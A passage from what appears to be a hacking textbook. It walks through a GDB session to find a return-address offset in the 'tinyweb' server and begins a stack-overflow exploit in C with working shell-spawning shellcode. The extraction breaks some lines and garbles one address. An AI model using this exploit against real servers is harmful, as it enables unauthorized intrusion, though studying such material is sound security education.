Graphics Programs Reference
In-Depth Information
$1 = 540
(gdb) p /x 0xbffff5c0 + 200
$2 = 0xbffff688
(gdb) quit
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019
r
eader@hacking:~/booksrc $
At the breakpoint, the request buffer begins at
0xbfffff5c0
. The
bt
com-
mand's stack backtrace shows that the return address from
handle_connection()
is
0x08048cf6
. Since we know how the local variables are generally laid out on
the stack, we know the request buffer is near the end of the frame. This means
that the stored return address should be on the stack somewhere near the
end of this 500-byte buffer. Since we already know the general area to look, a
quick inspection shows the stored return address is at
0xbffff7dc
(
). A little
math shows the stored return address is 540 bytes from the start of the request
buffer. However, there are a few bytes near the beginning of the buffer that
might be mangled by the rest of the function. Remember, we don't gain
control of the program until the function returns. To account for this, it's
best to just avoid the beginning of the buffer. Skipping the first 200 bytes
should be safe, while leaving plenty of space for shellcode in the remaining
300 bytes. This means
0xbffff688
is the target return address.
0x482
Almost Only Counts with Hand Grenades
The following exploit for the tinyweb program uses the offset and return
address overwrite values calculated with GDB. It fills the exploit buffer with
null bytes, so anything written into it will automatically be null-terminated.
Then it fills the first 540 bytes with NOP instructions. This builds the NOP
sled and fills the buffer up to the return address overwrite location. Then
the entire string is terminated with the
'\r\n'
line terminator.
tinyweb_exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "hacking.h"
#include "hacking-network.h"
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
#define OFFSET 540
